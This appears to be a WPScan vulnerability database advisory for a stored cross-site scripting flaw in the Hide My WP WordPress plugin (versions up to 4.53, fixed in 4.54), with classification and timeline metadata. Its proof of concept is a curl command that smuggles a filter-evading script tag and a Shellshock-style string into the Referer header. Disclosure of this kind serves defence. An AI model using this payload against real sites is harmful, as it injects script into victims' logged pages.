Hide My WP <= 4.53 - Stored-Cross Site Scripting (XSS)



Description
An attacker can make a fake attack attempt which will be logged, and can inject JavaScript.
Proof of Concept
curl --referer 'you are using bad filtering for input <sc<script>ript> alert("XSS here") </sc<script>ript>; () { :; };' http://example.com

Affects Plugin

fixed in version 4.54

References

URL https://codecanyon.net/item/hide-my-wp-no-one-can-know-you-use-wordpress/4177158

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter jurij
Views 6546
Verified No
WPVDB ID 8151

Timeline

Publicly Published 2015-08-13 (almost 5 years ago)
Added 2015-08-13 (almost 5 years ago)
Last Updated 2019-10-22 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin